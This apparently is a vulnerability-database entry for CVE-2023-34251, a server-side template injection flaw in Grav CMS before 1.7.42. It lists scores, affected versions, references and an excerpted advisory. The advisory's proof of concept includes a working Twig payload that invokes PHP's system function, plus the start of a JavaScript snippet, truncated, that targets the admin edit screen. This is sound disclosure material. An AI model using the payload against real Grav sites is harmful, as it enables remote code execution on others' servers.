CVE-2023-34251
Published 2023-06-14
Priority P3 · 47 · high · CVSS 3.1 base score 7.2
Vector: AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H
EPSS: 2.34% (81.5th percentile)
Grav is a flat-file content management system. Versions prior to 1.7.42 are vulnerable to server side template injection. Remote code execution is possible by embedding malicious PHP code on the administrator screen by a user with page editing privileges. Version 1.7.42 contains a fix for this issue.
Affected
2 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| getgrav | grav | < 1.7.42 | 1.7.42 |
| getgrav | grav | >= 0 < 1.7.42 | 1.7.42 |
OSV
Grav Server Side Template Injection (SSTI) vulnerability
osv·2023-06-16
CVE-2023-34251 [CRITICAL] Grav Server Side Template Injection (SSTI) vulnerability
### Summary
I found an RCE (Remote Code Execution) by SSTI in the admin screen.
### Details
Remote Code Execution is possible by embedding malicious PHP code on the administrator screen by a user with page editing privileges.
### PoC
1. Log in to the administrator screen and access the edit screen of the default page "Typography". (`http://127.0.0.1:8000/admin/pages/typography`)
2. Open the browser's console screen and execute the following JavaScript code to confirm that an arbitrary command (`id`) is being executed.
```js
(async () => {
const nonce = document.querySelector("input[name=admin-nonce]").value;
const id = document.querySelector("input[name=__unique_form_id__]").value;
const payload = "{{['id']|map('system')|join}}";
```
GHSA
Grav Server Side Template Injection (SSTI) vulnerability
ghsa·2023-06-16
CVE-2023-34251 [CRITICAL] CWE-94 Grav Server Side Template Injection (SSTI) vulnerability
No detection rules found.
No public exploits indexed.
No writeups or analysis indexed.
References
- https://github.com/getgrav/grav/blob/develop/system/src/Grav/Common/Twig/Extension/GravExtension.php#L174
- https://github.com/getgrav/grav/commit/9d01140a63c77075ef09b26ef57cf186138151a5
- https://github.com/getgrav/grav/security/advisories/GHSA-f9jf-4cp4-4fq5